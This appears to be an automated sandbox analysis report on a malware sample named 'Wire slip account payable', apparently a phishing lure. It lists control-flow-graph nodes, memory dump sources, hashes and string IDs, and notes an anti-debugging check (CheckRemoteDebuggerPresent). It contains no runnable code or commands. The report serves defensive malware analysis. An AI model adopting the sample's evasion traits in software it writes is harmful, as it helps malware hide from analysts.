                                                                                                                    control_flow_graph 656 6853070-6853091 659 6853093-6853096 656->659 660 6853837-685383a 659->660 661 685309c-68530bb 659->661 662 6853860-6853862 660->662 663 685383c-685385b 660->663 670 68530d4-68530de 661->670 671 68530bd-68530c0 661->671 664 6853864 662->664 665 6853869-685386c 662->665 663->662 664->665 665->659 667 6853872-685387b 665->667 675 68530e4-68530f3 670->675 671->670 673 68530c2-68530d2 671->673 673->675 784 68530f5 call 6853890 675->784 785 68530f5 call 6853888 675->785 677 68530fa-68530ff 678 6853101-6853107 677->678 679 685310c-68533e9 677->679 678->667 700 68533ef-685349e 679->700 701 6853829-6853836 679->701 710 68534c7 700->710 711 68534a0-68534c5 700->711 713 68534d0-68534e3 710->713 711->713 715 6853810-685381c 713->715 716 68534e9-685350b 713->716 715->700 717 6853822 715->717 716->715 719 6853511-685351b 716->719 717->701 719->715 720 6853521-685352c 719->720 720->715 721 6853532-6853608 720->721 733 6853616-6853646 721->733 734 685360a-685360c 721->734 738 6853654-6853660 733->738 739 6853648-685364a 733->739 734->733 740 68536c0-68536c4 738->740 741 6853662-6853666 738->741 739->738 742 6853801-685380a 740->742 743 68536ca-6853706 740->743 741->740 744 6853668-6853692 741->744 742->715 742->721 754 6853714-6853722 743->754 755 6853708-685370a 743->755 751 6853694-6853696 744->751 752 68536a0-68536bd 744->752 751->752 752->740 758 6853724-685372f 754->758 759 6853739-6853744 754->759 755->754 758->759 762 6853731 758->762 763 6853746-685374c 759->763 764 685375c-685376d 759->764 762->759 765 6853750-6853752 763->765 766 685374e 763->766 768 6853785-6853791 764->768 769 685376f-6853775 764->769 765->764 766->764 773 6853793-6853799 768->773 774 68537a9-68537fa 768->774 770 6853777 769->770 771 6853779-685377b 769->771 770->768 771->768 775 685379d-685379f 773->775 776 685379b 773->776 774->742 775->774 776->774 784->677 785->677
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: 318847b5b94e23bc4b32f4e84b04b3700e4554046643d4e9fa6757c68a836f4d
                                                                                                                    • Instruction ID: 1cce13b10be976dad388d48011164b6794746238849e76f2d4a80d8fede93886
                                                                                                                    • Opcode Fuzzy Hash: 318847b5b94e23bc4b32f4e84b04b3700e4554046643d4e9fa6757c68a836f4d
                                                                                                                    • Instruction Fuzzy Hash: 4C321F35E1071ACFCB14EF75D89469DB7B6BF89340F11C6A9D409AB224EB30AD85CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1392 6857da0-6857dbe 1393 6857dc0-6857dc3 1392->1393 1394 6857dc5-6857ddf 1393->1394 1395 6857de4-6857de7 1393->1395 1394->1395 1396 6857dfe-6857e01 1395->1396 1397 6857de9-6857df7 1395->1397 1398 6857e03-6857e0d 1396->1398 1399 6857e0e-6857e11 1396->1399 1404 6857e46-6857e5c 1397->1404 1405 6857df9 1397->1405 1402 6857e34-6857e36 1399->1402 1403 6857e13-6857e2f 1399->1403 1406 6857e3d-6857e40 1402->1406 1407 6857e38 1402->1407 1403->1402 1412 6858077-6858081 1404->1412 1413 6857e62-6857e6b 1404->1413 1405->1396 1406->1393 1406->1404 1407->1406 1414 6857e71-6857e8e 1413->1414 1415 6858082-685808a 1413->1415 1425 6858064-6858071 1414->1425 1426 6857e94-6857ebc 1414->1426 1418 6858092 1415->1418 1419 685808c-685808e 1415->1419 1423 6858094-6858095 1418->1423 1424 685809a-685809d 1418->1424 1421 6858096 1419->1421 1422 6858090 1419->1422 1427 6858097-6858099 1421->1427 1428 685809e-68580b7 1421->1428 1422->1418 1423->1421 1424->1428 1425->1412 1425->1413 1426->1425 1444 6857ec2-6857ecb 1426->1444 1427->1424 1429 68580b9-68580bc 1428->1429 1431 68580c2-68580ce 1429->1431 1432 6858169-685816c 1429->1432 1435 68580d9-68580db 1431->1435 1433 685818f-6858192 1432->1433 1434 685816e-685818a 1432->1434 1437 68583c7-68583c9 1433->1437 1438 6858198-68581a7 1433->1438 1434->1433 1439 68580f3-68580f7 1435->1439 1440 68580dd-68580e3 1435->1440 1441 68583d0-68583d3 1437->1441 1442 68583cb 1437->1442 1454 68581c6-685820a 1438->1454 1455 68581a9-68581c4 1438->1455 1448 6858105 1439->1448 1449 68580f9-6858103 1439->1449 1445 68580e5 1440->1445 1446 68580e7-68580e9 1440->1446 1441->1429 1447 68583d9-68583e2 1441->1447 1442->1441 1444->1415 1450 6857ed1-6857eed 1444->1450 1445->1439 1446->1439 1452 685810a-685810c 1448->1452 1449->1452 1461 6857ef3-6857f1d 1450->1461 1462 6858052-685805e 1450->1462 1456 6858123-685815c 1452->1456 1457 685810e-6858111 1452->1457 1463 6858210-6858221 1454->1463 1464 685839b-68583b1 1454->1464 1455->1454 1456->1438 1482 685815e-6858168 1456->1482 1457->1447 1480 6857f23-6857f4b 1461->1480 1481 6858048-685804d 1461->1481 1462->1425 1462->1444 1472 6858227-6858244 1463->1472 1473 6858386-6858395 1463->1473 1464->1437 1472->1473 1486 685824a-6858340 call 68565c0 1472->1486 1473->1463 1473->1464 1480->1481 1489 6857f51-6857f7f 1480->1489 1481->1462 1533 6858342-685834c 1486->1533 1534 685834e 1486->1534 1489->1481 1495 6857f85-6857f8e 1489->1495 1495->1481 1496 6857f94-6857fc6 1495->1496 1503 6857fd1-6857fed 1496->1503 1504 6857fc8-6857fcc 1496->1504 1503->1462 1507 6857fef-6858046 call 68565c0 1503->1507 1504->1481 1506 6857fce 1504->1506 1506->1503 1507->1462 1535 6858353-6858355 1533->1535 1534->1535 1535->1473 1536 6858357-685835c 1535->1536 1537 685835e-6858368 1536->1537 1538 685836a 1536->1538 1539 685836f-6858371 1537->1539 1538->1539 1539->1473 1540 6858373-685837f 1539->1540 1540->1473
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 3150a57c207ccf420a22e72ed6c1300a80c7352a629c75abe169a15a48021016
                                                                                                                    • Instruction ID: 8331b6733f08eec082093ab913c7dcbcfd1e9dff334c629b7facec45f250af1d
                                                                                                                    • Opcode Fuzzy Hash: 3150a57c207ccf420a22e72ed6c1300a80c7352a629c75abe169a15a48021016
                                                                                                                    • Instruction Fuzzy Hash: 3C02BD34B012159FDB54DF68D9906AEB7E2FF84304F15842AD906EB398DB35EC86CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: c83c1150ad9103ba1defb4cb3694989701c3a3b3973ad24e120ab723a8f50adc
                                                                                                                    • Instruction ID: 4ada1af01851478e93d79d0e298418c92ee3dfc68932923bd539e34b8d3c6265
                                                                                                                    • Opcode Fuzzy Hash: c83c1150ad9103ba1defb4cb3694989701c3a3b3973ad24e120ab723a8f50adc
                                                                                                                    • Instruction Fuzzy Hash: A222C035E102198FDF64DBA8C4846AEBBF2EF89324F118469DA05EB354DB31DD41CB92
                                                                                                                    APIs
                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011B70C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0
                                                                                                                    • Opcode ID: f1ee3b302896b738c7c2b360b87053b2d39fa1eec537995c9b9a0711a129e23d
                                                                                                                    • Instruction ID: 3066b40b99d6c279c40dfadc24adc283b839c0e423263511ad80d34822e7e592
                                                                                                                    • Opcode Fuzzy Hash: f1ee3b302896b738c7c2b360b87053b2d39fa1eec537995c9b9a0711a129e23d
                                                                                                                    • Instruction Fuzzy Hash: 4A2128B1800259CFCB14CF9AD584BEEBBF4EF49320F14846AE455A7250D778A944CF65
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7a588ad9ac4e33d6879d94cef8a92a8451f4f2022112ab13bc4978207c624d91
                                                                                                                    • Instruction ID: a5bac7c719960d293b33118a6f6cb7a12e360ec48af4e07f07fb8c25c4448793
                                                                                                                    • Opcode Fuzzy Hash: 7a588ad9ac4e33d6879d94cef8a92a8451f4f2022112ab13bc4978207c624d91
                                                                                                                    • Instruction Fuzzy Hash: 1E925734A00204CFDB64DB68C594A6DBBF2FB44314F56C4AAD949EB361EB35ED85CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7fff2750eb49533eb6af8deb33c3399e56c4cd47ecc5416aaa631021f5d4fb3c
                                                                                                                    • Instruction ID: 809598d788ea8172c04dd6cf518eec14afd4e8a95c339ff98ce4b5b600c86391
                                                                                                                    • Opcode Fuzzy Hash: 7fff2750eb49533eb6af8deb33c3399e56c4cd47ecc5416aaa631021f5d4fb3c
                                                                                                                    • Instruction Fuzzy Hash: 6D62D134B002048FDB54DB68D580BADB7F2EF88314F558469E906EB361EB35ED86CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52a6ceda9a5cfd309b0327018fdf17d1969bf21104888b04a8bbe70277f52feb
                                                                                                                    • Instruction ID: 67bd61301ac800a44ec0a159c77a1dd9fab48acc18ba82d19299edbed6049319
                                                                                                                    • Opcode Fuzzy Hash: 52a6ceda9a5cfd309b0327018fdf17d1969bf21104888b04a8bbe70277f52feb
                                                                                                                    • Instruction Fuzzy Hash: 9C329E34B003098FDB54DB68D980AAEB7F2EB88314F118529E906EB355DB34EC46CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f09f9fbd859bb2acbe901caa3797789d12279ba4471fd0daf7cc13add7114256
                                                                                                                    • Instruction ID: 3d9c7cd20541fdb31ca77b2f74f72b46623c4d4fa0735987b81004cc10ba5449
                                                                                                                    • Opcode Fuzzy Hash: f09f9fbd859bb2acbe901caa3797789d12279ba4471fd0daf7cc13add7114256
                                                                                                                    • Instruction Fuzzy Hash: CB228034E002099FDF64DB68D5A07AEB7F2EB59310F218826E909EB391DB35DC85CB51

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 528 685acf0-685ad0e 529 685ad10-685ad13 528->529 530 685ad15-685ad1e 529->530 531 685ad23-685ad26 529->531 530->531 532 685ad30-685ad33 531->532 533 685ad28-685ad2d 531->533 534 685ad35-685ad3e 532->534 535 685ad4d-685ad50 532->535 533->532 536 685ad44-685ad48 534->536 537 685af27-685af35 534->537 538 685ad73-685ad76 535->538 539 685ad52-685ad6e 535->539 536->535 547 685afb4-685afb7 537->547 548 685af37-685af5e 537->548 540 685ad78-685ad85 538->540 541 685ad8a-685ad8d 538->541 539->538 540->541 543 685ad8f-685ad93 541->543 544 685ad9e-685ada1 541->544 550 685af1c-685af26 543->550 551 685ad99 543->551 552 685ada7-685adaa 544->552 553 685af0d-685af16 544->553 554 685af60-685af63 548->554 551->544 555 685adc4-685adc6 552->555 556 685adac-685adbf 552->556 553->534 553->550 560 685af65 call 685b248 554->560 561 685af72-685af75 554->561 557 685adcd-685add0 555->557 558 685adc8 555->558 556->555 557->529 562 685add6-685adfa 557->562 558->557 569 685af6b-685af6d 560->569 564 685af77-685af93 561->564 565 685af98-685af9b 561->565 583 685ae00-685ae0f 562->583 584 685af0a 562->584 564->565 567 685af9d-685afa1 565->567 568 685afa8-685afab 565->568 570 685afc1-685affc 567->570 571 685afa3 567->571 572 685afad-685afb3 568->572 573 685afb8-685afbb 568->573 569->561 585 685b002-685b00e 570->585 586 685b1ef-685b202 570->586 571->568 572->547 573->570 576 685b224-685b226 573->576 580 685b22d-685b230 576->580 581 685b228 576->581 580->554 582 685b236-685b240 580->582 581->580 590 685ae27-685ae62 call 68565c0 583->590 591 685ae11-685ae17 583->591 584->553 592 685b010-685b029 585->592 593 685b02e-685b072 585->593 587 685b204 586->587 587->576 607 685ae64-685ae6a 590->607 608 685ae7a-685ae91 590->608 594 685ae19 591->594 595 685ae1b-685ae1d 591->595 592->587 609 685b074-685b086 593->609 610 685b08e-685b0cd 593->610 594->590 595->590 611 685ae6c 607->611 612 685ae6e-685ae70 607->612 622 685ae93-685ae99 608->622 623 685aea9-685aeba 608->623 609->610 616 685b1b4-685b1c9 610->616 617 685b0d3-685b1ae call 68565c0 610->617 611->608 612->608 616->586 617->616 624 685ae9d-685ae9f 622->624 625 685ae9b 622->625 629 685aed2-685af03 623->629 630 685aebc-685aec2 623->630 624->623 625->623 629->584 631 685aec4 630->631 632 685aec6-685aec8 630->632 631->629 632->629
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: 0b941bc2528ff52de614197cf59d3ac4117d51f1c27a3eb80b5071d904d52c81
                                                                                                                    • Instruction ID: 1a8af80d1a0f41d0f7f7512b765f5cc11f5e20980319a714318d9c2bacfd0592
                                                                                                                    • Opcode Fuzzy Hash: 0b941bc2528ff52de614197cf59d3ac4117d51f1c27a3eb80b5071d904d52c81
                                                                                                                    • Instruction Fuzzy Hash: 25E19F30E102098FDF69EF68D5906AEB7B2EF89304F218629D905EB355DB70DC46CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 786 685b668-685b688 787 685b68a-685b68d 786->787 788 685b693-685b696 787->788 789 685b7bb-685b7c1 787->789 790 685b6bd-685b6c0 788->790 791 685b698-685b69c 788->791 792 685b6d5-685b6db 789->792 793 685b7c7 789->793 798 685b6d0-685b6d3 790->798 799 685b6c2-685b6cb 790->799 795 685ba03-685ba3e 791->795 796 685b6a2-685b6b2 791->796 794 685b6e1-685b6e8 792->794 792->795 797 685b7cc-685b7cf 793->797 800 685b6ed-685b6f0 794->800 810 685ba40-685ba43 795->810 815 685b89c-685b8a0 796->815 816 685b6b8 796->816 801 685b7d1-685b7ed 797->801 802 685b7f2-685b7f5 797->802 798->792 798->800 799->798 804 685b6f2-685b6fb 800->804 805 685b70d-685b710 800->805 801->802 806 685b7f7-685b7f8 802->806 807 685b7fd-685b800 802->807 804->795 811 685b701-685b708 804->811 812 685b712-685b715 805->812 813 685b71a-685b71d 805->813 806->807 807->806 814 685b802-685b805 807->814 817 685bcaf-685bcb2 810->817 818 685ba49-685ba71 810->818 811->805 812->813 821 685b744-685b747 813->821 822 685b71f-685b723 813->822 819 685b807-685b80d 814->819 820 685b812-685b815 814->820 815->795 823 685b8a6-685b8b6 815->823 816->790 825 685bcd5-685bcd7 817->825 826 685bcb4-685bcd0 817->826 875 685ba73-685ba76 818->875 876 685ba7b-685babf 818->876 819->820 827 685b817-685b865 call 68565c0 820->827 828 685b86a-685b86d 820->828 821->806 830 685b74d-685b750 821->830 822->795 829 685b729-685b739 822->829 823->822 841 685b8bc 823->841 833 685bcde-685bce1 825->833 834 685bcd9 825->834 826->825 827->828 835 685b884-685b887 828->835 836 685b86f-685b873 828->836 829->806 857 685b73f 829->857 837 685b764-685b767 830->837 838 685b752-685b759 830->838 833->810 845 685bce7-685bcf0 833->845 834->833 849 685b897-685b89a 835->849 850 685b889-685b892 835->850 836->795 846 685b879-685b87f 836->846 842 685b774-685b777 837->842 843 685b769-685b76f 837->843 839 685b972-685b97b 838->839 840 685b75f 838->840 854 685b980-685b983 839->854 840->837 855 685b8c1-685b8c4 841->855 851 685b7b6-685b7b9 842->851 852 685b779-685b78e 842->852 843->842 846->835 849->815 849->855 850->849 851->789 851->797 852->795 872 685b794-685b7b1 852->872 861 685b985-685b98a 854->861 862 685b98d-685b990 854->862 858 685b8d4-685b8d7 855->858 859 685b8c6-685b8cf 855->859 857->821 868 685b8d9-685b8dc 858->868 869 685b8e8-685b8f1 858->869 859->858 861->862 866 685b9b2-685b9b5 862->866 867 685b992-685b9ad 862->867 870 685b9c7-685b9ca 866->870 871 685b9b7 866->871 867->866 873 685b8e3-685b8e6 868->873 874 685b8de-685b8e0 868->874 869->804 877 685b8f7 869->877 870->806 880 685b9d0-685b9d3 870->880 883 685b9bf-685b9c2 871->883 872->851 873->869 881 685b8fc-685b8ff 873->881 874->873 875->845 907 685bac5-685bace 876->907 908 685bca4-685bcae 876->908 877->881 885 685b9d5-685b9d9 880->885 886 685b9e6-685b9e8 880->886 887 685b901-685b90d 881->887 888 685b912-685b915 881->888 883->870 885->795 893 685b9db-685b9e1 885->893 894 685b9ef-685b9f2 886->894 895 685b9ea 886->895 887->888 890 685b917-685b92c 888->890 891 685b953-685b956 888->891 890->795 905 685b932-685b94e 890->905 897 685b96d-685b970 891->897 898 685b958-685b95c 891->898 893->886 894->787 899 685b9f8-685ba02 894->899 895->894 897->839 897->854 898->795 903 685b962-685b968 898->903 903->897 905->891 909 685bad4-685bb40 call 68565c0 907->909 910 685bc9a-685bc9f 907->910 920 685bb46-685bb4b 909->920 921 685bc3a-685bc4f 909->921 910->908 923 685bb67 920->923 924 685bb4d-685bb53 920->924 921->910 927 685bb69-685bb6f 923->927 925 685bb55-685bb57 924->925 926 685bb59-685bb5b 924->926 928 685bb65 925->928 926->928 929 685bb84-685bb91 927->929 930 685bb71-685bb77 927->930 928->927 937 685bb93-685bb99 929->937 938 685bba9-685bbb6 929->938 931 685bc25-685bc34 930->931 932 685bb7d 930->932 931->920 931->921 932->929 933 685bbec-685bbf9 932->933 934 685bbb8-685bbc5 932->934 946 685bc11-685bc1e 933->946 947 685bbfb-685bc01 933->947 944 685bbc7-685bbcd 934->944 945 685bbdd-685bbea 934->945 940 685bb9d-685bb9f 937->940 941 685bb9b 937->941 938->931 940->938 941->938 950 685bbd1-685bbd3 944->950 951 685bbcf 944->951 945->931 946->931 948 685bc05-685bc07 947->948 949 685bc03 947->949 948->946 949->946 950->945 951->945
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: 3d84f10127caec08a66890371f3a306c11c1de300b8c93e75fbfdc65cc246fb2
                                                                                                                    • Instruction ID: 0e2f23bb8d7a54ec7864d219fff52e8d6a865852e5b9c1e62c0eee9aa34afd06
                                                                                                                    • Opcode Fuzzy Hash: 3d84f10127caec08a66890371f3a306c11c1de300b8c93e75fbfdc65cc246fb2
                                                                                                                    • Instruction Fuzzy Hash: 4C029B30E002098FDB64DF68D5A06ADB7F2FB55314F22896AE909EB355DB31DC85CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 954 685cf60-685cf7b 955 685cf7d-685cf80 954->955 956 685cf82-685cf98 955->956 957 685cf9d-685cfa0 955->957 956->957 958 685cfa2-685cfa7 957->958 959 685cfaa-685cfad 957->959 958->959 960 685cff6-685cff9 959->960 961 685cfaf-685cff1 959->961 963 685d042-685d045 960->963 964 685cffb-685d03d 960->964 961->960 966 685d047-685d089 963->966 967 685d08e-685d091 963->967 964->963 966->967 970 685d0a0-685d0a3 967->970 971 685d093-685d095 967->971 975 685d0a5-685d0b4 970->975 976 685d0ec-685d0ef 970->976 973 685d449 971->973 974 685d09b 971->974 983 685d44c-685d458 973->983 974->970 981 685d0b6-685d0bb 975->981 982 685d0c3-685d0cf 975->982 978 685d0f1-685d100 976->978 979 685d138-685d13b 976->979 984 685d102-685d107 978->984 985 685d10f-685d11b 978->985 987 685d184-685d187 979->987 988 685d13d-685d17f 979->988 981->982 990 685d0d5-685d0e7 982->990 991 685d97d-685d98a 982->991 983->978 989 685d45e-685d74b 983->989 984->985 985->991 994 685d121-685d133 985->994 987->983 995 685d18d-685d190 987->995 988->987 1175 685d751-685d757 989->1175 1176 685d972-685d97c 989->1176 990->976 1010 685d992 991->1010 1011 685d98c-685d98e 991->1011 994->979 997 685d192-685d194 995->997 998 685d19f-685d1a2 995->998 1006 685d307-685d310 997->1006 1007 685d19a 997->1007 1008 685d1a4-685d1e6 998->1008 1009 685d1eb-685d1ee 998->1009 1016 685d312-685d317 1006->1016 1017 685d31f-685d32b 1006->1017 1007->998 1008->1009 1020 685d237-685d23a 1009->1020 1021 685d1f0-685d232 1009->1021 1018 685d994-685d995 1010->1018 1019 685d99a-685d99d 1010->1019 1013 685d996 1011->1013 1014 685d990 1011->1014 1027 685d99e-685d9b6 1013->1027 1028 685d998-685d999 1013->1028 1014->1010 1016->1017 1029 685d331-685d345 1017->1029 1030 685d43c-685d441 1017->1030 1018->1013 1019->1027 1025 685d283-685d286 1020->1025 1026 685d23c-685d27e 1020->1026 1021->1020 1037 685d2a9-685d2ac 1025->1037 1038 685d288-685d2a4 1025->1038 1026->1025 1036 685d9b8-685d9bb 1027->1036 1028->1019 1029->973 1052 685d34b-685d35d 1029->1052 1030->973 1044 685d9bd-685d9e9 1036->1044 1045 685d9ee-685d9f1 1036->1045 1039 685d2f5-685d2f7 1037->1039 1040 685d2ae-685d2f0 1037->1040 1038->1037 1049 685d2fe-685d301 1039->1049 1050 685d2f9 1039->1050 1040->1039 1044->1045 1053 685da14-685da17 1045->1053 1054 685d9f3-685da0f 1045->1054 1049->955 1049->1006 1050->1049 1074 685d381-685d383 1052->1074 1075 685d35f-685d365 1052->1075 1056 685da26-685da28 1053->1056 1057 685da19 call 685dad5 1053->1057 1054->1053 1062 685da2f-685da32 1056->1062 1063 685da2a 1056->1063 1070 685da1f-685da21 1057->1070 1062->1036 1071 685da34-685da43 1062->1071 1063->1062 1070->1056 1088 685da45-685daa8 call 68565c0 1071->1088 1089 685daaa-685dabf 1071->1089 1078 685d38d-685d399 1074->1078 1079 685d367 1075->1079 1080 685d369-685d375 1075->1080 1093 685d3a7 1078->1093 1094 685d39b-685d3a5 1078->1094 1086 685d377-685d37f 1079->1086 1080->1086 1086->1078 1088->1089 1105 685dac0 1089->1105 1099 685d3ac-685d3ae 1093->1099 1094->1099 1099->973 1102 685d3b4-685d3d0 call 68565c0 1099->1102 1113 685d3d2-685d3d7 1102->1113 1114 685d3df-685d3eb 1102->1114 1105->1105 1113->1114 1114->1030 1117 685d3ed-685d43a 1114->1117 1117->973 1177 685d766-685d76f 1175->1177 1178 685d759-685d75e 1175->1178 1177->991 1179 685d775-685d788 1177->1179 1178->1177 1181 685d962-685d96c 1179->1181 1182 685d78e-685d794 1179->1182 1181->1175 1181->1176 1183 685d796-685d79b 1182->1183 1184 685d7a3-685d7ac 1182->1184 1183->1184 1184->991 1185 685d7b2-685d7d3 1184->1185 1188 685d7d5-685d7da 1185->1188 1189 685d7e2-685d7eb 1185->1189 1188->1189 1189->991 1190 685d7f1-685d80e 1189->1190 1190->1181 1193 685d814-685d81a 1190->1193 1193->991 1194 685d820-685d839 1193->1194 1196 685d955-685d95c 1194->1196 1197 685d83f-685d866 1194->1197 1196->1181 1196->1193 1197->991 1200 685d86c-685d876 1197->1200 1200->991 1201 685d87c-685d893 1200->1201 1203 685d895-685d8a0 1201->1203 1204 685d8a2-685d8bd 1201->1204 1203->1204 1204->1196 1209 685d8c3-685d8dc call 68565c0 1204->1209 1213 685d8de-685d8e3 1209->1213 1214 685d8eb-685d8f4 1209->1214 1213->1214 1214->991 1215 685d8fa-685d94e 1214->1215 1215->1196
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HM$HM$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-822121483
                                                                                                                    • Opcode ID: 328a2fc2b4b5361463e537e76658ba7eba2feea6abec1d1976de1981aaf95772
                                                                                                                    • Instruction ID: 15a738383e43a70c8525b1b810b0d5db9479c276e847e8af4e369f1cfd23702e
                                                                                                                    • Opcode Fuzzy Hash: 328a2fc2b4b5361463e537e76658ba7eba2feea6abec1d1976de1981aaf95772
                                                                                                                    • Instruction Fuzzy Hash: 08626130A002058FCB55EB68D690A5DB7F2FF84304B218929D819DF769DB75ED8ACB84

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1223 6859170-6859195 1225 6859197-685919a 1223->1225 1226 68591a0-68591b5 1225->1226 1227 6859a58-6859a5b 1225->1227 1234 68591b7-68591bd 1226->1234 1235 68591cd-68591e3 1226->1235 1228 6859a81-6859a83 1227->1228 1229 6859a5d-6859a7c 1227->1229 1231 6859a85 1228->1231 1232 6859a8a-6859a8d 1228->1232 1229->1228 1231->1232 1232->1225 1236 6859a93-6859a9d 1232->1236 1237 68591c1-68591c3 1234->1237 1238 68591bf 1234->1238 1241 68591ee-68591f0 1235->1241 1237->1235 1238->1235 1242 68591f2-68591f8 1241->1242 1243 6859208-6859279 1241->1243 1244 68591fc-68591fe 1242->1244 1245 68591fa 1242->1245 1254 68592a5-68592c1 1243->1254 1255 685927b-685929e 1243->1255 1244->1243 1245->1243 1260 68592c3-68592e6 1254->1260 1261 68592ed-6859308 1254->1261 1255->1254 1260->1261 1266 6859333-685934e 1261->1266 1267 685930a-685932c 1261->1267 1272 6859350-685936c 1266->1272 1273 6859373-6859381 1266->1273 1267->1266 1272->1273 1274 6859391-685940b 1273->1274 1275 6859383-685938c 1273->1275 1281 685940d-685942b 1274->1281 1282 6859458-685946d 1274->1282 1275->1236 1286 6859447-6859456 1281->1286 1287 685942d-685943c 1281->1287 1282->1227 1286->1281 1286->1282 1287->1286
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
